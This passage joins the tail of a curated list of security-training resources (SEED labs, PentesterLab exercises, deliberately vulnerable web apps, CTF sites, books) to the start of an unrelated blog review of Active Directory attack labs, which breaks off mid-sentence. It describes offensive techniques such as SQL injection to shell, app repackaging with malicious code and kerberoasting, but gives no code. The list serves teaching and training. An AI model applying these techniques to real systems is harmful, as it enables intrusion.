Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Shellshock)<br> Launch attack to exploit the Shellshock vulnerability that is discovered in late 2014. ### Network Security Labs These labs cover topics on network security, ranging from attacks on TCP/IP and DNS to various network security technologies (Firewall, VPN, and IPSec). - [TCP/IP Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/TCPIP)<br> Launching attacks to exploit the vulnerabilities of the TCP/IP protocol, including session hijacking, SYN flooding, TCP reset attacks, etc. - [Heartbleed Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/Heartbleed)<br> Using the heartbleed attack to steal secrets from a remote server. - [Local DNS Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/DNS_Local)<br> Using several methods to conduct DNS pharming attacks on computers in a LAN environment. - [Remote DNS Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/DNS_Remote)<br> Using the Kaminsky method to launch DNS cache poisoning attacks on remote DNS servers. - [Packet Sniffing and Spoofing Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/Sniffing_Spoofing)<br> Writing programs to sniff packets sent over the local network; writing programs to spoof various types of packets. - [Linux Firewall Exploration Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/Firewall_Linux)<br> Writing a simple packet-filter firewall; playing with Linux's built-in firewall software and web-proxy firewall; experimenting with ways to evade firewalls. - [Firewall-VPN Lab: Bypassing Firewalls using VPN](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/Firewall_VPN)<br> Implement a simple vpn program (client/server), and use it to bypass firewalls. - [Virtual Private Network (VPN) Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/VPN)<br> Design and implement a transport-layer VPN system for Linux, using the TUN/TAP technologies. This project requires at least a month of time to finish, so it is good for final project. - [Minix IPSec Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/IPSec)<br> Implement the IPSec protocol in the Minix operating system and use it to set up Virtual Private Networks. - [Minix Firewall Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/Firewall_Minix)<br> Implementing a simple firewall in Minix operating system. ### Web Security Labs These labs cover some of the most common vulnerabilities in web applications. The labs show students how attacks work in exploiting these vulnerabilities. #### Elgg-Based Labs Elgg is an open-source social-network system. We have modified it for our labs. - [Cross-Site Scripting Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_XSS_Elgg)<br> Launching the cross-site scripting attack on a vulnerable web application. Conducting experiments with several countermeasures. - [Cross-Site Request Forgery Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_CSRF_Elgg)<br> Launching the cross-site request forgery attack on a vulnerable web application. Conducting experiments with several countermeasures. - [Web Tracking Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_Tracking_Elgg)<br> Experimenting with the web tracking technology to see how users can be checked when they browse the web. - [SQL Injection Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_SQL_Injection)<br> Launching the SQL-injection attack on a vulnerable web application. Conducting experiments with several countermeasures. #### Collabtive-Based Labs Collabtive is an open-source web-based project management system. We have modified it for our labs. - [Cross-site Scripting Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Web/XSS_Collabtive)<br> Launching the cross-site scripting attack on a vulnerable web application. Conducting experiments with several countermeasures. - [Cross-site Request Forgery Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Web/CSRF_Collabtive)<br> Launching the cross-site request forgery attack on a vulnerable web application. Conducting experiments with several countermeasures. - [SQL Injection Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Web/SQL_Injection_Collabtive)<br> Launching the SQL-injection attack on a vulnerable web application. Conducting experiments with several countermeasures. - [Web Browser Access Control Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Web/Web_SOP_Collabtive)<br> Exploring browser's access control system to understand its security policies. #### PhpBB-Based Labs PhpBB is an open-source web-based message board system, allowing users to post messages. We have modified it for our labs. - [Cross-site Scripting Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Attacks_XSS)<br> Launching the cross-site scripting attack on a vulnerable web application. Conducting experiments with several countermeasures. - [Cross-site Request Forgery Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Attacks_CSRF)<br> Launching the cross-site request forgery attack on a vulnerable web application. Conducting experiments with several countermeasures. - [SQL Injection Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Attacks_SQL_Injection)<br> Launching the SQL-injection attack on a vulnerable web application. Conducting experiments with several countermeasures. - [ClickJacking Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Vulnerability/ClickJacking)<br> Launching the ClickJacking attack on a vulnerable web site. Conducting experiments with several countermeasures. ### System Security Labs These labs cover the security mechanisms in operating system, mostly focusing on access control mechanisms in Linux. - [Linux Capability Exploration Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/System/Capability_Exploration)<br> Exploring the POSIX 1.e capability system in Linux to see how privileges can be divided into smaller pieces to ensure the compliance with the Least Privilege principle. - [Role-Based Access Control (RBAC) Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/System/RBAC_Cap)<br> Designing and implementing an integrated access control system for Minix that uses both capability-based and role-based access control mechanisms. Students need to modify the Minix kernel. - [Encrypted File System Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/System/EFS)<br> Designing and implementing an encrypted file system for Minix. Students need to modify the Minix kernel. ### Cryptography Labs These labs cover three essential concepts in cryptography, including secrete-key encryption, one-way hash function, and public-key encryption and PKI. - [Secret Key Encryption Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Crypto/Crypto_Encryption)<br> Exploring the secret-key encryption and its applications using OpenSSL. - [One-Way Hash Function Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Crypto/Crypto_Hash)<br> Exploring one-way hash function and its applications using OpenSSL. - [Public-Key Cryptography and PKI Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Crypto/Crypto_PublicKey)<br> Exploring public-key cryptography, digital signature, certificate, and PKI using OpenSSL. ### Mobile Security Labs These labs focus on the smartphone security, covering the most common vulnerabilities and attacks on mobile devices. An Android VM is provided for these labs. - [Android Repackaging Lab](http://www.cis.syr.edu/~wedu/seed/Labs_Android5.1/Android_Repackaging)<br> Insert malicious code inside an existing Android app, and repackage it. - [Android Device Rooting Lab](http://www.cis.syr.edu/~wedu/seed/Labs_Android5.1/Android_Rooting)<br> Develop an OTA (Over-The-Air) package from scratch to root an Android device. ## Pentester Lab There is only one way to properly learn web penetration testing: by getting your hands dirty. We teach how to manually find and exploit vulnerabilities. You will understand the root cause of the problems and the methods that can be used to exploit them. Our exercises are based on common vulnerabilities found in different systems. The issues are not emulated. We provide you real systems with real vulnerabilities. - [From SQL Injection to Shell](https://pentesterlab.com/exercises/from_sqli_to_shell)<br> This exercise explains how you can, from a SQL injection, gain access to the administration console. Then in the administration console, how you can run commands on the system. - [From SQL Injection to Shell II](https://pentesterlab.com/exercises/from_sqli_to_shell_II)<br> This exercise explains how you can, from a blind SQL injection, gain access to the administration console. Then in the administration console, how you can run commands on the system. - [From SQL Injection to Shell: PostgreSQL edition](https://pentesterlab.com/exercises/from_sqli_to_shell_pg_edition)<br> This exercise explains how you can from a SQL injection gain access to the administration console. Then in the administration console, how you can run commands on the system. - [Web for Pentester](https://pentesterlab.com/exercises/web_for_pentester)<br> This exercise is a set of the most common web vulnerabilities. - [Web for Pentester II](https://pentesterlab.com/exercises/web_for_pentester_II)<br> This exercise is a set of the most common web vulnerabilities. - [PHP Include And Post Exploitation](https://pentesterlab.com/exercises/php_include_and_post_exploitation)<br> This exercice describes the exploitation of a local file include with limited access. Once code execution is gained, you will see some post exploitation tricks. - [Linux Host Review](https://pentesterlab.com/exercises/linux_host_review)<br> This exercice explains how to perform a Linux host review, what and how you can check the configuration of a Linux server to ensure it is securely configured. The reviewed system is a traditional Linux-Apache-Mysql-PHP (LAMP) server used to host a blog. - [Electronic Code Book](https://pentesterlab.com/exercises/ecb)<br> This exercise explains how you can tamper with an encrypted cookies to access another user's account. - [Rack Cookies and Commands injection](https://pentesterlab.com/exercises/rack_cookies_and_commands_injection)<br> After a short brute force introduction, this exercice explains the tampering of rack cookie and how you can even manage to modify a signed cookie (if the secret is trivial). Using this issue, you will be able to escalate your privileges and gain commands execution. - [Padding Oracle](https://pentesterlab.com/exercises/padding_oracle)<br> This course details the exploitation of a weakness in the authentication of a PHP website. The website uses Cipher Block Chaining (CBC) to encrypt information provided by users and use this information to ensure authentication. The application also leaks if the padding is valid when decrypting the information. We will see how this behavior can impact the authentication and how it can be exploited. - [XSS and MySQL FILE](https://pentesterlab.com/exercises/xss_and_mysql_file)<br> This exercise explains how you can use a Cross-Site Scripting vulnerability to get access to an administrator's cookies. Then how you can use his/her session to gain access to the administration to find a SQL injection and gain code execution using it. - [Axis2 Web service and Tomcat Manager](https://pentesterlab.com/exercises/axis2_and_tomcat_manager)<br> This exercice explains the interactions between Tomcat and Apache, then it will show you how to call and attack an Axis2 Web service. Using information retrieved from this attack, you will be able to gain access to the Tomcat Manager and deploy a WebShell to gain commands execution. - [Play Session Injection](https://pentesterlab.com/exercises/play_session_injection)<br> This exercise covers the exploitation of a session injection in the Play framework. This issue can be used to tamper with the content of the session while bypassing the signing mechanism. - [Play XML Entities](https://pentesterlab.com/exercises/play_xxe)<br> This exercise covers the exploitation of a XML entities in the Play framework. - [CVE-2007-1860: mod_jk double-decoding](https://pentesterlab.com/exercises/cve-2007-1860)<br> This exercise covers the exploitation of CVE-2007-1860. This vulnerability allows an attacker to gain access to unaccessible pages using crafted requests. This is a common trick that a lot of testers miss. - [CVE-2008-1930: Wordpress 2.5 Cookie Integrity Protection Vulnerability](https://pentesterlab.com/exercises/cve-2008-1930)<br> This exercise explains how you can exploit CVE-2008-1930 to gain access to the administration interface of a Wordpress installation. - [CVE-2012-1823: PHP CGI](https://pentesterlab.com/exercises/cve-2012-1823)<br> This exercise explains how you can exploit CVE-2012-1823 to retrieve the source code of an application and gain code execution. - [CVE-2012-2661: ActiveRecord SQL injection](https://pentesterlab.com/exercises/cve-2012-2661)<br> This exercise explains how you can exploit CVE-2012-2661 to retrieve information from a database. - [CVE-2012-6081: MoinMoin code execution](https://pentesterlab.com/exercises/cve-2012-6081)<br> This exercise explains how you can exploit CVE-2012-6081 to gain code execution. This vulnerability was exploited to compromise Debian's wiki and Python documentation website. - [CVE-2014-6271/Shellshock](https://pentesterlab.com/exercises/cve-2014-6271)<br> This exercise covers the exploitation of a Bash vulnerability through a CGI. ## Dr. Thorsten Schneider's Binary Auditing Learn the fundamentals of Binary Auditing. Know how HLL mapping works, get more inner file understanding than ever. Learn how to find and analyse software vulnerability. Dig inside Buffer Overflows and learn how exploits can be prevented. Start to analyse your first viruses and malware the safe way. Learn about simple tricks and how viruses look like using real life examples. - [Binary Auditing](http://www.binary-auditing.com/) ## Damn Vulnerable Web Application (DVWA) Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goal is to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and to aid both students & teachers to learn about web application security in a controlled class room environment. - [Damn Vulnerable Web Application (DVWA)](https://github.com/ethicalhack3r/DVWA) ## Damn Vulnerable Web Services Damn Vulnerable Web Services is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities. The aim of this project is to help security professionals learn about Web Application Security through the use of a practical lab environment. - [Damn Vulnerable Web Services](https://github.com/snoopysecurity/dvws) ## NOWASP (Mutillidae) OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiest. With dozens of vulns and hints to help the user; this is an easy-to-use web hacking environment designed for labs, security enthusiast, classrooms, CTF, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, corporate web sec training courses, and as an "assess the assessor" target for vulnerability assessment software. - [OWASP Mutillidae](http://sourceforge.net/projects/mutillidae/files/) ## OWASP Broken Web Applications Project Open Web Application Security Project (OWASP) Broken Web Applications Project, a collection of vulnerable web applications that is distributed on a Virtual Machine in VMware format compatible with their no-cost and commercial VMware products. - [OWASP Broken Web Applications Project](https://sourceforge.net/projects/owaspbwa/files/1.2/) ## OWASP Bricks Bricks is a web application security learning platform built on PHP and MySQL. The project focuses on variations of commonly seen application security issues. Each 'Brick' has some sort of security issue which can be leveraged manually or using automated software tools. The mission is to 'Break the Bricks' and thus learn the various aspects of web application security. - [OWASP Bricks](http://sechow.com/bricks/download.html) ## OWASP Hackademic Challenges Project The Hackademic Challenges implement realistic scenarios with known vulnerabilities in a safe and controllable environment. Users can attempt to discover and exploit these vulnerabilities in order to learn important concepts of information security through an attacker's perspective. - [OWASP Hackademic Challenges project](https://github.com/Hackademic/hackademic/) ## Web Attack and Exploitation Distro (WAED) The Web Attack and Exploitation Distro (WAED) is a lightweight virtual machine based on Debian Distribution. WAED is pre-configured with various real-world vulnerable web applications in a sandboxed environment. It includes pentesting tools that aid in finding web application vulnerabilities. The main motivation behind this project is to provide a practical environment to learn about web application's vulnerabilities without the hassle of dealing with complex configurations. Currently, there are around 18 vulnerable applications installed in WAED. - [Web Attack and Exploitation Distro (WAED)](http://www.waed.info/) ## Xtreme Vulnerable Web Application (XVWA) XVWA is a badly coded web application written in PHP/MySQL that helps security enthusiasts to learn application security. It’s not advisable to host this application online as it is designed to be “Xtremely Vulnerable”. We recommend hosting this application in local/controlled environment and sharpening your application security ninja skills with any tools of your own choice. It’s totally legal to break or hack into this. The idea is to evangelize web application security to the community in possibly the easiest and fundamental way. Learn and acquire these skills for good purpose. How you use these skills and knowledge base is not our responsibility. - [Xtreme Vulnerable Web Application (XVWA)](https://github.com/s4n7h0/xvwa) ## WebGoat: A deliberately insecure Web Application WebGoat is a deliberately insecure web application maintained by OWASP designed to teach web application security lessons. - [WebGoat](https://github.com/WebGoat/WebGoat) ## Audi-1's SQLi-LABS SQLi-LABS is a comprehensive test bed to Learn and understand nitti gritty of SQL injections and thereby helps professionals understand how to protect. - [SQLi-LABS](https://github.com/Audi-1/sqli-labs) - [SQLi-LABS Videos](http://www.securitytube.net/user/Audi) Capture the Flag ================ #### Hack The Box This pentester training platform/lab is full of machines (boxes) to hack on the different difficulty level. Majority of the content generated by the community and released on the website after the staff's approval. Besides boxes users also can pick static challenges or work on advanced tasks like Fortress or Endgame. - [Hack The Box link](https://www.hackthebox.eu/) #### Vulnhub We all learn in different ways: in a group, by yourself, reading books, watching/listening to other people, making notes or things out for yourself. Learning the basics & understanding them is essential; this knowledge can be enforced by then putting it into practice. Over the years people have been creating these resources and a lot of time has been put into them, creating 'hidden gems' of training material. However, unless you know of them, its hard to discover them. So VulnHub was born to cover as many as possible, creating a catalogue of 'stuff' that is (legally) 'breakable, hackable & exploitable' - allowing you to learn in a safe environment and practice 'stuff' out. When something is added to VulnHub's database it will be indexed as best as possible, to try and give you the best match possible for what you're wishing to learn or experiment with. - [Vulnhub Repository](https://www.vulnhub.com/) #### CTF Write Ups - [CTF Resources](https://ctfs.github.io/resources)<br> A general collection of information, tools, and tips regarding CTFs and similar security competitions. - [CTF write-ups 2016](https://github.com/ctfs/write-ups-2016)<br> Wiki-like CTF write-ups repository, maintained by the community. (2015) - [CTF write-ups 2015](https://github.com/ctfs/write-ups-2015)<br> Wiki-like CTF write-ups repository, maintained by the community. (2015) - [CTF write-ups 2014](https://github.com/ctfs/write-ups-2014)<br> Wiki-like CTF write-ups repository, maintained by the community. (2014) - [CTF write-ups 2013](https://github.com/ctfs/write-ups-2013)<br> Wiki-like CTF write-ups repository, maintained by the community. (2013) ### CTF Repos - [captf](http://captf.com)<br> This site is primarily the work of psifertex since he needed a dump site for a variety of CTF material and since many other public sites documenting the art and sport of Hacking Capture the Flag events have come and gone over the years. - [shell-storm](http://shell-storm.org/repo/CTF)<br> The Jonathan Salwan's little corner. ### CTF Courses - [Hopper's Roppers CTF Course](https://hoppersroppers.github.io/courseCTF.html)<br> Free course designed to teach the fundamentals of Forensics, Cryptography, and Web-Exploitation required to be successful in Capture the Flag competitions. At the end of the course, students compete in the picoCTF event with guidance from instructors. SecurityTube Playlists ====================== Security Tube hosts a large range of video tutorials on IT security including penetration testing , exploit development and reverse engineering. * [SecurityTube Metasploit Framework Expert (SMFE)](http://www.securitytube.net/groups?operation=view&groupId=10)<br> This video series covers basics of Metasploit Framework. We will look at why to use metasploit then go on to how to exploit vulnerbilities with help of metasploit and post exploitation techniques with meterpreter. * [Wireless LAN Security and Penetration Testing Megaprimer](http://www.securitytube.net/groups?operation=view&groupId=9)<br> This video series will take you through a journey in wireless LAN (in)security and penetration testing. We will start from the very basics of how WLANs work, graduate to packet sniffing and injection attacks, move on to audit infrastructure vulnerabilities, learn to break into WLAN clients and finally look at advanced hybrid attacks involving wireless and applications. * [Exploit Research Megaprimer](http://www.securitytube.net/groups?operation=view&groupId=7)<br> In this video series, we will learn how to program exploits for various vulnerabilities published online. We will also look at how to use various tools and techniques to find Zero Day vulnerabilities in both open and closed source software. * [Buffer Overflow Exploitation Megaprimer for Linux](http://www.securitytube.net/groups?operation=view&groupId=4)<br> In this video series, we will understand the basic of buffer overflows and understand how to exploit them on linux based systems. In later videos, we will also look at how to apply the same principles to Windows and other selected operating systems. Open Security Books =================== #### Crypto 101 - lvh Comes with everything you need to understand complete systems such as SSL/TLS: block ciphers, stream ciphers, hash functions, message authentication codes, public key encryption, key agreement protocols, and signature algorithms. Learn how to exploit common cryptographic flaws, armed with nothing but a little time and your favorite programming language. Forge administrator cookies, recover passwords, and even backdoor your own random number generator. - [Crypto101](https://www.crypto101.io/) - [LaTeX Source](https://github.com/crypto101/book) #### A Graduate Course in Applied Cryptography - Dan Boneh & Victor Shoup This book is about constructing practical cruptosystems for which we can argue security under plausible assumptions. The book covers many constructions for different tasks in cryptography. For each task we define the required goal. To analyze the constructions, we develop a unified framework for doing cryptographic proofs. A reader who masters this framework will capable of applying it to new constructions that may not be covered in this book. We describe common mistakes to avoid as well as attacks on real-world systems that illustratre the importance of rigor in cryptography. We end every chapter with a fund application that applies the ideas in the chapter in some unexpected way. - [A Graduate Course in Applied Cryptography](https://crypto.stanford.edu/~dabo/cryptobook/) #### Security Engineering, A Guide to Building Dependable Distributed Systems - Ross Anderson The world has changed radically since the first edition of this book was published in 2001. Spammers, virus writers, phishermen, money launderers, and spies now trade busily with each other in a lively online criminal economy and as they specialize, they get better. In this indispensable, fully updated guide, Ross Anderson reveals how to build systems that stay dependable whether faced with error or malice. Here?s straight talk on critical topics such as technical engineering basics, types of attack, specialized protection mechanisms, security psychology, policy, and more. - [Security Engineering, Second Edition](https://www.cl.cam.ac.uk/~rja14/book.html) #### Reverse Engineering for Beginners - Dennis Yurichev This book offers a primer on reverse-engineering, delving into disassembly code-level reverse engineering and explaining how to decipher assembly language for those beginners who would like to learn to understand x86 (which accounts for almost all executable software in the world) and ARM code created by C/C++ compilers. - [Reverse Engineering for Beginners](http://beginners.re/) - [LaTeX Source](https://github.com/dennis714/RE-for-beginners) #### CTF Field Guide - Trail of Bits The focus areas that CTF competitions tend to measure are vulnerability discovery, exploit creation, toolkit creation, and operational tradecraft.. Whether you want to succeed at CTF, or as a computer security professional, you'll need to become an expert in at least one of these disciplines. Ideally in all of them. - [CTF Field Guide](https://trailofbits.github.io/ctf/) - [Markdown Source](https://github.com/trailofbits/ctf) Challenges ========== - [Reverse Engineering Challenges](https://challenges.re/) - [Matasano Crypto Challenges](http://cryptopals.com/) Documentation ============= #### OWASP - Open Web Application Security Project The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations worldwide can make informed decisions about true software security risks. - [Open Web Application Security Project](https://www.owasp.org/index.php/Main_Page) #### Applied Crypto Hardening - bettercrypto.org This guide arose out of the need for system administrators to have an updated, solid, well re-searched and thought-through guide for configuring SSL, PGP,SSH and other cryptographic tools in the post-Snowdenage. Triggered by the NSA leaks in the summer of 2013, many system administrators and IT security officers saw the need to strengthen their encryption settings.This guide is specifically written for these system administrators. - [Applied Crypto Hardening](https://bettercrypto.org/static/applied-crypto-hardening.pdf) - [LaTeX Source](https://github.com/BetterCrypto/Applied-Crypto-Hardening) #### PTES - Penetration Testing Execution Standard The penetration testing execution standard cover everything related to a penetration test - from the initial communication and reasoning behind a pentest, through the intelligence gathering and threat modeling phases where testers are working behind the scenes in order to get a better understanding of the tested organization, through vulnerability research, exploitation and post exploitation, where the technical security expertise of the testers come to play and combine with the business understanding of the engagement, and finally to the reporting, which captures the entire process, in a manner that makes sense to the customer and provides the most value to it. - [Penetration Testing Execution Standard](http://www.pentest-standard.org/index.php/Main_Page) Related Awesome Lists ===================== - [Awesome Pentest](https://github.com/enaqx/awesome-pentest)<br> A collection of awesome penetration testing resources, tools and other shiny things. - [Awesome Appsec](https://github.com/paragonie/awesome-appsec)<br> A curated list of resources for learning about application security. - [Awesome Malware Analysis](https://github.com/rshipp/awesome-malware-analysis)<br> A curated list of awesome malware analysis tools and resources. - [Android Security Awesome](https://github.com/ashishb/android-security-awesome)<br> A collection of android security related resources. - [Awesome CTF](https://github.com/apsdehal/awesome-ctf)<br> A curated list of CTF frameworks, libraries, resources and softwares. - [Awesome Security](https://github.com/sbilly/awesome-security)<br> A collection of awesome software, libraries, documents, books, resources and cools stuffs about security. - [Awesome Honeypots](https://github.com/paralax/awesome-honeypots)<br> A curated list of awesome honeypots, tools, components and much more. - [Awesome Incident Response](https://github.com/meirwah/awesome-incident-response)<br> A curated list of tools and resources for security incident response, aimed to help security analysts and DFIR teams. - [Awesome Threat Intelligence](https://github.com/hslatman/awesome-threat-intelligence)<br> A curated list of awesome Threat Intelligence resources. - [Awesome PCAP Tools](https://github.com/caesar0301/awesome-pcaptools)<br> A collection of tools developed by other researchers in the Computer Science area to process network traces. - [Awesome Forensics](https://github.com/Cugu/awesome-forensics)<br> A curated list of awesome forensic analysis tools and resources. - [Awesome Hacking](https://github.com/carpedm20/awesome-hacking)<br> A curated list of awesome Hacking tutorials, tools and resources. - [Awesome Industrial Control System Security](https://github.com/hslatman/awesome-industrial-control-system-security)<br> A curated list of resources related to Industrial Control System (ICS) security. - [Awesome Web Hacking](https://github.com/infoslack/awesome-web-hacking)<br> This list is for anyone wishing to learn about web application security but do not have a starting point. - [Awesome Sec Talks](https://github.com/PaulSec/awesome-sec-talks)<br> A curated list of awesome Security talks. - [Awesome YARA](https://github.com/InQuest/awesome-yara)<br> A curated list of awesome YARA rules, tools, and people. - [Sec Lists](https://github.com/danielmiessler/SecLists)<br> SecLists is the security tester's companion. It is a collection of multiple types of lists used during security assessments. List types include usernames, passwords, URLs, sensitive data grep strings, fuzzing payloads, and many more. [Contributing](https://github.com/onlurking/awesome-infosec/blob/master/contributing.md) ===================== Pull requests and issues with suggestions are welcome! License ======= [![Creative Commons License](http://i.creativecommons.org/l/by/4.0/88x31.png)](http://creativecommons.org/licenses/by/4.0/) This work is licensed under a [Creative Commons Attribution 4.0 International License](http://creativecommons.org/licenses/by/4.0/).
# Active Directory Labs/exams Review If you know me, you probably know that I've taken a bunch of Active Directory Attacks Labs so far, and I've been asked to write a review several times. After passing the CRTE exam recently, I decided to finally write a review on multiple Active Directory Labs/Exams! Note that when I say Active Directory Labs, I actually mean it from an offensive perspective (i.e. a red teamer/attacker), not a defensive perspective. Furthermore, I’m only going to focus on the courses/exams that have a practical portion. Those that tests you with multiple choice questions such as CRTOP from IACRB will be ignored. # Whoami I graduated from an elite university (Johns Hopkins University) with a master’s degree in Cybersecurity. I have a strong background in a lot of domains in cybersecurity, but I'm mainly focused in penetration testing and red teaming. I am currently a senior penetration testing and vulnerability assessment consultant at one of the biggest cybersecurity consultancy companies in Saudi Arabia where we offer consultancy to numerous clients between the public and private sector. I hold a number of penetration testing certificates such as: * OSEP * OSCE * OSCP * CRTE * CRTO * GPEN * eCPTX * GWAPT * OSWP * CREST CRT * eCPPTv2 * ECSA (Practical) Additionally, I hold a certificate in Purple Teaming: * GDAT My current rank in Hack The Box is Omniscient, which is only achievable after hacking 100% of the challenges at some point. More information about me can be found here: https://www.linkedin.com/in/rian-saaty-1a7700143/ # General Recommendation As a general recommendation, it is nice to have at least OSCP OR eCPPT before jumping to Active Directory attacks because you will actually need to be good network pentester to finish most of the labs that I'll be mentioning. If you think you're good enough without those certificates, by all means, go ahead and start the labs! These labs are at least for junior pentesters, not for total noobs so please make sure not to waste your time & money if you know nothing about what I'm mentioning. Moreover, some knowledge about SQL, coding, network protocols, operating systems, and Active Directory is kind of assumed and somewhat necessary in most cases. You should obviously understand and know how to pivot through networks and use proxychains and other tools that you may need to use. Specifically, the use of Impacket for a lot of aspects in the lab is a must so if you haven't used it before, it may be a good start. The use of at least either BloodHound or PowerView is also a must. Antivirus evasion may be expected in some of the labs as well as other security constraints so be ready for that too! The reason I'm saying all this is that you actually need the "Try Harder" mentality for most of the labs that I'll be discussing here. In fact, most of them don't even come with a course! # Introduction Some of the courses/labs/exams that are related to Active Directory that I've done include the following: **HackTheBox's Endgames:** * P.O.O * Xen * Hades **HackTheBox's Pro Labs:** * Offshore * RastaLabs **Elearn Security's Penetration Testing eXtreme** * eLearnSecurity Certified Penetration Tester eXtreme certification (eCPTX) **Pentester Academy's Windows Red Team Lab** * Certified Red Team Expert (CRTE) **Zero-Point Security's Red Team Operator** * Certified Red Team Operator (CRTO) **Evasion Techniques and Breaching Defenses (PEN-300)** * Offensive Security Experienced Penetration Tester (OSEP) There are of course more AD environments that I've dealt with such as the private ones that I face in "real life" as a cybersecurity consultant as well as the small AD environments I face in some of Hack The Box's machines. (I will obviously not cover those because it will take forever). Also, note that this is by no means a comprehensive list of all AD labs/courses as there are much more red teaming/active directory labs/courses/exams out there. There are 2 in Hack The Box that I haven't tried yet (one Endgame & one Pro Lab), CRTP from Pentester Academy (beginner friendly), PACES from Pentester Academy, and a couple of Specter Ops courses that I've heard really good things about but still don't have time to try them. Once I do any of the labs I just mentioned, I'll keep updating this article so feel free to check it once in a while! I'll be talking about most if not all of the labs without spoiling much and with some recommendations too! All of the labs contain a lot of knowledge and most of the things that you'll find in them can be seen in real life. In fact, I've seen a lot of them in real life! I will also compare prices, course content, ease of use, ease of reset/reset frequency, ease of support, & certain requirements before starting the labs, if any. Note that I've taken some of them a long time ago so some portion of the review may be a bit rusty, but I'll do my best :) To begin with, let's start with the Endgames. Endgames can't be normally accessed without achieving at least "Guru rank" in Hack The Box, which is only achievable after finishing at least 90% of the challenges in Hack The Box. This includes both machines and side CTF challenges. This can be a bit hard because Hack The Box keeps adding new machines and challenges every single week. However, once you're Guru, you're always going to be Guru even if you stopped doing any machine/challenge forever. The good thing is, once you reach Guru, ALL Endgame Labs will be FREE except for the ones that gets retired. I've done all of the Endgames before they expire. To make things clear, Hack The Box's active machines/labs/challenges have no writeups and it would be illegal to share their solutions with others UNTIL they expire. So far, the only Endgames that have expired are P.O.O. & Xen. The catch here is that WHEN something is expired in Hack The Box, you will be able to access it ONLY with VIP subscriptions even if you are Guru and above! Additionally, solutions will usually be available for VIP users OR when someone writes a writeup for it online :) Another good news (assuming that you haven't done Endgames before) is that with your VIP subscription, you will be able to access 2 Endgames at the same time! # Endgame Professional Offensive Operations (P.O.O.): I've completed P.O.O Endgame back in January 2019 when it was for Guru ranked users and above so here is what I remember so far from it: **Price:** Comes with Hack The Box's VIP Subscription (£10 monthly) regardless of your rank. If you ask me, this is REALLY cheap! **Ease of use:** Easy. You get an .ovpn file and you connect to it. **Ease of reset:** Can be reset ONLY after 5 VIP users vote to reset it. This is actually good because if no one other than you want to reset, then you probably don't need a reset! **Ease of support:** Community support only! Meaning that you'll have to reach out to people in the forum to ask for help if you get stuck OR in the discord channel. **Course:** Doesn't come with any course, it's just a lab so you need to either know what you're doing or have the Try Harder mentality! **Goal:** "The goal is to compromise the perimeter host, escalate privileges and ultimately compromise the domain while collecting several flags along the way." **Certificate:** N/A. You'll just get one badge once you're done. **Exam:** N/A. **Difficulty:** Intermediate **Release Date:** March 2018. **Retired:** June 2020. The lab itself is small as it contains only 2 Windows machines. Not really "entry level" for Active Directory to be honest but it is good if you want to learn more about MSSQL Abuse and other AD attacks. It is worth mentioning that the lab contains more than just AD misconfiguration. It needs enumeration, abusing IIS vulnerabilities, fuzzing, MSSQL enumeration, SQL servers’ links abuse, abusing kerberoastable users, cracking hashes, and finally abusing service accounts to escalate privileges to system! Overall, a lot of work for those 2 machines! If you think you're ready, feel free to start once you purchase the VIP package from here: https://www.hackthebox.eu/home/endgame/view/1 Since it is a retired lab, there is an official writeup from Hack The Box for VIP users + others are allowed to do unofficial writeups without any issues. **SPOILER ALERT** Here is an example of a nice writeup of the lab: https://snowscan.io/htb-writeup-poo/# # Endgame Xen: I've completed Xen Endgame back in July 2019 when it was for Guru ranked users and above so here is what I remember so far from it: **Price:** Comes with Hack The Box's VIP Subscription (£10 monthly) regardless of your rank. If you ask me, this is REALLY cheap! **Ease of use:** Easy. You get an .ovpn file and you connect to it. **Ease of reset:** Can be reset ONLY after 5 VIP users vote to reset it. This is actually good because if no one other than you want to reset, then you probably don't need a reset! **Ease of support:** Community support only! Meaning that you'll have to reach out to people in the forum to ask for help if you got stuck OR in the discord channel. **Course:** Doesn't come with any course, it's just a lab so you need to either know what you're doing or have the Try Harder mentality! **Goal:** "The goal is to gain a foothold on the internal network, escalate privileges and ultimately compromise the domain while collecting several flags along the way." **Certificate:** N/A. You'll just get one badge once you're done. **Exam:** N/A. **Difficulty:** Intermediate **Release Date:** June 2019. **Retired:** June 2020. Even though the lab is bigger than P.O.O, it only contains only 6 machines, so it is still considered 